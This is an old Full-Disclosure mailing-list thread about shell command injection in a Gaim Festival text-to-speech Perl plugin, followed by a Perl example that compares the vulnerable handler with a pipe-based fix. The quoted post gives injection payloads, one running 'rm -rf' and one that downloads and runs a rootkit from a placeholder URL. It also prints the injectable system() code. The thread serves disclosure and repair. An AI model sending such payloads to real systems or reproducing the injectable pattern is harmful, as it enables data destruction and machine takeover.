[Full-Disclosure] Re: Gaim festival plugin exploit

From: HCTITS Security Division (security_at_humancentrictech.com)
Date: 10/18/03

    Date: 17 Oct 2003 21:05:07 -0400

    DUH... would help if I attached my attachment.

    I am right proud of myself for this, and it also needs mention to
    address the security issue that our friend Error (is that a reference to
    Zelda 2?) raised.

    Attached, find the latest reissue of the Gaim festival plugin. The guy
    that wrote it wrote it for the pre-0.68 Perl API, but it was secure against
    the sort of attack that Error described. I have since taken it and
    recoded it to work with post-0.68 versions of Gaim. It is attached. By
    all means, if you see an exploitable bug in there, let me know! I'm
    just a Perl tot...

    Cheers,
    ~Brian

    On Wed, 2003-10-15 at 11:29, error wrote:
    > It has come to my attention that people have actually used this example
    > code for a gaim plugin:
    >
    > AIM::register("Festival TTS", "0.0.1", "goodbye", "");
    > AIM::print("Perl Says", "Loaded Festival TTS");
    > AIM::command("idle", "60000") if ($pro ne "Offline");
    > AIM::add_event_handler("event_im_recv", "synthesize");
    >
    > sub goodbye {
    >     AIM::print("Module Unloaded", "Unloaded Festival TTS");
    > }
    >
    > sub synthesize {
    >     my $string = $_[0];
    >     $string =~ s/\<.*?\>//g;
    >     $string =~ s/\".*\"//;
    >     system("echo \"$string\" | /usr/bin/festival --tts");
    > }
    >
    > As taken from:
    > http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
    >
    > This has to be one of the most amusing ways to gain a local user's
    > privileges I have ever seen by an "Expert (TM)".
    >
    > Exploit code?
    > You have a shell through gaim with that.
    >
    > Just pass it this message (or really any message for that matter):
    >
    > Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
    >
    > Or perhaps:
    >
    > Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
    > rootkit;./rootkit
    >
    > Perhaps someone should ask:
    >
    > "(Is s/[^\w]//g really that hard to do?!)"
    >
    > So a fixed version would look like this:
    >
    > AIM::register("Festival TTS", "0.0.1", "goodbye", "");
    > AIM::print("Perl Says", "Loaded Festival TTS");
    > AIM::command("idle", "60000") if ($pro ne "Offline");
    > AIM::add_event_handler("event_im_recv", "synthesize");
    >
    > sub goodbye {
    >     AIM::print("Module Unloaded", "Unloaded Festival TTS");
    > }
    >
    > sub synthesize {
    >     my $string = $_[0];
    >     $string =~ s/\<.*?\>//g;
    >     $string =~ s/\".*\"//;
    >     $string =~ s/[^\w]//g;
    >     system("echo \"$string\" | /usr/bin/festival --tts");
    > }
    >
    > Just a minor comment, nothing special.

    -- 
    HCTITS Security Division <security@humancentrictech.com>
    HumanCentric Technologies

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
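
The two handlers side by side, as an added Perl example that is neither Brian's attachment nor the webreference.com plugin. It reproduces the string the original `synthesize` hands to `system()` for the first payload in the thread, and beside it a version that never builds a command line at all: the list form of a pipe `open()` exec()s festival directly, with no `/bin/sh` in between, and the message text is written to festival's stdin, where it is data rather than syntax. The `speak` helper, its `@command` parameter and the use of `cat -` as a stand-in for festival are this example's own additions, so it can be run on a machine without festival installed.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed sample input: the first payload from the post, exactly as an
# incoming IM would deliver it to the event_im_recv handler.
my $payload = q{Hey, I just wanted to exploit your box, do you mind?"; rm -rf;};

# The original handler, reduced to the string it hands to system().
# A single-string system() containing shell metacharacters runs /bin/sh -c,
# so the quote and semicolons inside $string close the echo's argument and
# start a second command (here: rm -rf).
sub vulnerable_command {
    my ($string) = @_;
    $string =~ s/<.*?>//g;   # strip HTML tags
    $string =~ s/".*"//;     # removes a *balanced pair* of quotes only; the
                             # payload carries a single quote, so nothing goes
    return qq{echo "$string" | /usr/bin/festival --tts};
}

# Hardened handler: do not assemble a command line from the message.
# With two or more elements in @command, the pipe open() exec()s the program
# directly (no shell), and the message goes to its stdin as plain data.
# @command defaults to festival; pass ('cat', '-') to see the text arrive
# unchanged on a machine without festival.  Returns the child's exit status.
sub speak {
    my ($string, @command) = @_;
    @command = ('/usr/bin/festival', '--tts') unless @command;
    $string =~ s/<.*?>//g;   # strip HTML tags; no other filtering is needed
    open(my $tts, '|-', @command) or die "cannot run $command[0]: $!";
    print {$tts} "$string\n";
    close($tts) or warn "$command[0] exited with status ", $? >> 8, "\n";
    return $? >> 8;
}

print "Command the original plugin would hand to /bin/sh:\n  ",
      vulnerable_command($payload), "\n\n";
print "Same message through the list-form pipe (cat stands in for festival):\n  ";
speak($payload, 'cat', '-');
```

Running it prints the shell command with `"; rm -rf;` sitting outside the quotes, then the message itself, quote and semicolons included, echoed back literally by `cat`. Two caveats worth keeping in mind when reading the thread: the `s/\".*\"//` line only ever removes a balanced pair of quotes, so a lone quote, a backtick or `$(...)` passes straight through, and the proposed `s/[^\w]//g` fix also strips every space and punctuation mark, so festival would be asked to read the whole message as one run-together word. Removing the shell from the path, as above, fixes the injection without having to enumerate dangerous characters.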